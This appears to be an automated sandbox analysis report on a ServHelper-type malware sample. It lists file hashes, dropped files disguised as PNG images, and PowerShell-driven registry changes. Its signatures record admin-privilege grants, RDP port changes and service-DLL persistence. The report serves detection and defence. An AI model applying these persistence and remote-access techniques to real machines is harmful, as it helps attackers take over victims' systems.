MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/760-79-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\01ximcta\CSC1CD5A0B993214D799C33BD3EA94FE8DB.TMP

MD5 42603dc250c3469d8ff863b9671b6313
SHA1 91c7bce655a0491e0d50b6dab7dde14b221a01d3
SHA256 762182f7e8a444b1dcacbc73fd042f9d75d66f3d05dd03ef192ebaa8a6cb5047
SHA512 b41143d10349932df879c5acb612b9036b2eae6e3e788e86a651c0dd870492d1f51ca041b56d0860aa396b895005859e776637a113e636d1ac5a989056f75cce

C:\Users\Admin\AppData\Local\Temp\RES81DB.tmp

MD5 94d14dfed3873526664668b0b2aa023d
SHA1 2ed962b8f740d481a852519368d0d9d4cfea07b1
SHA256 1cebb023058d62c7383e6fd1c865e5197f522a6a09412d3c1beb802b105871ab
SHA512 230f221e9c082c2a3b5db10180a69ee837111d2a28324b562602d8d645951c433855a6065f973a5dcb1f0dafe8307dfeb925e28e9546da3bcb5601ea230d893e

C:\Users\Admin\AppData\Local\Temp\01ximcta\01ximcta.dll

MD5 d990115e609be57a826dde95367044ad
SHA1 644a4c0e5be849aeea5b39bac10e0a7eebc063b8
SHA256 c8adc0962bbd0ab534eb18d0791056bd9adfabd8f638b621c9dc0d8f403d03d3
SHA512 706e77cb17f5d03354643ad996944f223d5f78c83dffd5666efd46bd922d15bbe4a668dbdeaef70efba1b0f63da57f38bb4500bcd769591b489ff9c6e26f6c6c

memory/1224-83-0x0000000001F50000-0x0000000001F51000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 9fca6b1768eba2c5d42f189123152e32
SHA1 560ec3249af6e8d82e994554475b870d32145352
SHA256 c5c7012656bfebd5ba7d4ae8459bd2fcc57ac661e413e2b1da339b9fba86de1f
SHA512 b72f2bc28dcde144596eabb62375479c4ddb3b004ac8759ee9523170289f55572784e695a552fd612a5dc5a56f6c76b3baee9831c7cac7123f72b2eb2aadb3f2

memory/1224-85-0x000000001B820000-0x000000001B821000-memory.dmp

memory/1224-86-0x000000001B8A0000-0x000000001B8A1000-memory.dmp

memory/1224-87-0x00000000025F0000-0x00000000025F1000-memory.dmp

memory/1552-88-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 bd009f8192e4bf5c50d7ff2882d1bbe5
SHA1 4735a9e2f4a6188ed8d57639b0e0841a36150b83
SHA256 2cdd22d384c6c7d7a2ef71db040d83597dd7ea59a7d125e69bae11295300b124
SHA512 4b554b9d026b9d00e879004148f8028ee3b7420c6d05ac249b560649f9961feca01e835e86ad2871f9dc477b5ae5d7d38bd4f32c1e967406a0de2aefbdb62045

memory/1552-94-0x000000001ACD4000-0x000000001ACD6000-memory.dmp

memory/1552-93-0x000000001ACD0000-0x000000001ACD2000-memory.dmp

memory/1552-96-0x0000000002390000-0x0000000002391000-memory.dmp

memory/1552-98-0x000000001ABB0000-0x000000001ABB1000-memory.dmp

memory/1552-100-0x000000001AC40000-0x000000001AC41000-memory.dmp

memory/1552-101-0x0000000002580000-0x0000000002581000-memory.dmp

memory/1224-102-0x000000001AC6A000-0x000000001AC89000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 097dc02256d474be1e33a9ffc66c910b
SHA1 aa0d1ead57b57cb7472fec127a9f013e2863ece9
SHA256 60eea41c8a20e29efe82cd3b3a252cb3f3ac1477ffe02ed6b912c2f6bcd37ecd
SHA512 bd4add82d5cbe9f5c545fcbc402642efac1a90b30dd373fc6b14ece46ad389ad56b7d89dfa97c0f7c9c4a7afa93467c2735cd742dfe9095930649a0ca24e0bed

memory/1552-107-0x000000001B950000-0x000000001B951000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_654a8ace-004d-41ec-aa50-916d4034f062

MD5 6f0d509e28be1af95ba237d4f43adab4
SHA1 c665febe79e435843553bee86a6cea731ce6c5e4
SHA256 f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA512 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

memory/1552-120-0x000000001B730000-0x000000001B731000-memory.dmp

memory/1552-121-0x000000001B7C0000-0x000000001B7C1000-memory.dmp

memory/1808-122-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 bd009f8192e4bf5c50d7ff2882d1bbe5
SHA1 4735a9e2f4a6188ed8d57639b0e0841a36150b83
SHA256 2cdd22d384c6c7d7a2ef71db040d83597dd7ea59a7d125e69bae11295300b124
SHA512 4b554b9d026b9d00e879004148f8028ee3b7420c6d05ac249b560649f9961feca01e835e86ad2871f9dc477b5ae5d7d38bd4f32c1e967406a0de2aefbdb62045

memory/1808-125-0x000000001AC90000-0x000000001AC92000-memory.dmp

memory/1808-129-0x0000000002680000-0x0000000002681000-memory.dmp

memory/1808-131-0x000000001AC00000-0x000000001AC01000-memory.dmp

memory/1808-133-0x0000000002860000-0x0000000002861000-memory.dmp

memory/1808-134-0x0000000002320000-0x0000000002321000-memory.dmp

memory/1808-135-0x000000001AC94000-0x000000001AC96000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 5a773c88f360a9b88e4674ff5f27b147
SHA1 248ab57c0259cbdf1ebbcefbb1659a3e132604a4
SHA256 99e66670d93c9d83cf2d21b89a1b871a6e67bbcbc2678372c98691f4a4ab821a
SHA512 2cb0bb7bba07701f59ce6ff242368719f85c4310da6074d24c81ab2b94f022f7dfffc5fcd0390195b0a27315f5ef98a415702dc57192e3f079ba539005790351

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_639ab942-c81f-47d4-ac03-65966cfc5380

MD5 a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA1 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256 dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA512 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8f9e8596-b8dd-41c6-940e-311ae33f2ac3

MD5 faa37917b36371249ac9fcf93317bf97
SHA1 a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256 b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0d3ae33b-746f-4323-ba74-bdb028a07a8c

MD5 2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1 ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256 ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512 edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c42c2c11-0ed0-47cd-b39d-ce907cad38ae

MD5 d89968acfbd0cd60b51df04860d99896
SHA1 b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA256 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512 b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6c50b578-02d4-4dc6-be97-f7b6cb578ea7

MD5 e5b3ba61c3cf07deda462c9b27eb4166
SHA1 b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256 b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512 a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_786aa4ad-8de6-4b09-9648-184e34d9e2f4

MD5 7f79b990cb5ed648f9e583fe35527aa7
SHA1 71b177b48c8bd745ef02c2affad79ca222da7c33
SHA256 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA512 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

memory/1716-143-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 bd009f8192e4bf5c50d7ff2882d1bbe5
SHA1 4735a9e2f4a6188ed8d57639b0e0841a36150b83
SHA256 2cdd22d384c6c7d7a2ef71db040d83597dd7ea59a7d125e69bae11295300b124
SHA512 4b554b9d026b9d00e879004148f8028ee3b7420c6d05ac249b560649f9961feca01e835e86ad2871f9dc477b5ae5d7d38bd4f32c1e967406a0de2aefbdb62045

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1716-151-0x00000000027A4000-0x00000000027A6000-memory.dmp

memory/1716-150-0x00000000027A0000-0x00000000027A2000-memory.dmp

memory/1224-158-0x000000001C800000-0x000000001C801000-memory.dmp

memory/1756-159-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/1696-161-0x0000000000000000-mapping.dmp

memory/1380-162-0x0000000000000000-mapping.dmp

memory/1368-163-0x0000000000000000-mapping.dmp

memory/1516-164-0x0000000000000000-mapping.dmp

memory/952-165-0x0000000000000000-mapping.dmp

memory/1736-166-0x0000000000000000-mapping.dmp

memory/624-167-0x0000000000000000-mapping.dmp

memory/1332-168-0x0000000000000000-mapping.dmp

memory/1820-169-0x0000000000000000-mapping.dmp

memory/1616-170-0x0000000000000000-mapping.dmp

memory/1492-171-0x0000000000000000-mapping.dmp

memory/1844-172-0x0000000000000000-mapping.dmp

memory/1084-173-0x0000000000000000-mapping.dmp

memory/1800-174-0x0000000000000000-mapping.dmp

memory/1632-175-0x0000000000000000-mapping.dmp

memory/1600-176-0x0000000000000000-mapping.dmp

memory/1984-177-0x0000000000000000-mapping.dmp

memory/1080-178-0x0000000000000000-mapping.dmp

memory/988-179-0x0000000000000000-mapping.dmp

memory/316-180-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 0750828e5a80dae0280c43945332e145
SHA1 fa1c85c33c0b99f8df14b6ccbd37f5df3d62c30c
SHA256 637dd8f4245397e281bf84433f75eeb40461e70e81a11a4c2c252dc8f9e4b947
SHA512 a45f4023f5d8951fef44bbe830c1b8992e7cb9c013882048d7227bac0c76869584c1ccc1d323803ced7a1e353998d0bface12eb9ef1dcd04e8e39b155528fd14

\Windows\Branding\mediasvc.png

MD5 0941efccfdbde6a619081456be071102
SHA1 4d9079f335bfdb4e88e022ffdd2193c4561f099d
SHA256 99dbace98f5f29a5c0c962db270dc195a8b6d2f8dbb009b79b929ff9d68d8281
SHA512 bbb587471dec6beae7852ae2ee1fff0efb26ce57ab69dbaf4385c965bf09a31be60c67951e52f488866daa0effab715e6b1a0aca5b02a7fdcc5dd586d84d56ab

memory/1020-183-0x0000000000000000-mapping.dmp

memory/1920-184-0x0000000000000000-mapping.dmp

memory/1208-185-0x0000000000000000-mapping.dmp

memory/860-186-0x0000000000000000-mapping.dmp

memory/1072-187-0x0000000000000000-mapping.dmp

memory/456-188-0x0000000000000000-mapping.dmp

memory/292-189-0x0000000000000000-mapping.dmp

memory/788-190-0x0000000000000000-mapping.dmp

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/368-192-0x0000000000000000-mapping.dmp

memory/1008-193-0x0000000000000000-mapping.dmp

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1808-195-0x0000000000000000-mapping.dmp

memory/820-196-0x0000000000000000-mapping.dmp

memory/844-197-0x0000000000000000-mapping.dmp

memory/1464-198-0x0000000000000000-mapping.dmp

memory/1832-199-0x0000000000000000-mapping.dmp

memory/1320-200-0x0000000000000000-mapping.dmp

memory/1320-206-0x0000000000F60000-0x0000000000F62000-memory.dmp

memory/1320-207-0x0000000000F64000-0x0000000000F66000-memory.dmp

memory/1320-236-0x0000000000F6A000-0x0000000000F89000-memory.dmp

memory/1484-237-0x0000000000000000-mapping.dmp

memory/1920-238-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-22 06:21

Reported

2021-09-22 06:23

Platform

win10-en-20210920

Max time kernel

113s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"

Signatures

suricata: ET MALWARE ServHelper CnC Inital Checkin

suricata

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tl1c2fkk.jw4.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3E23.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3F01.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3E82.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3EA2.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3F12.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ho2h1bbl.ym0.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
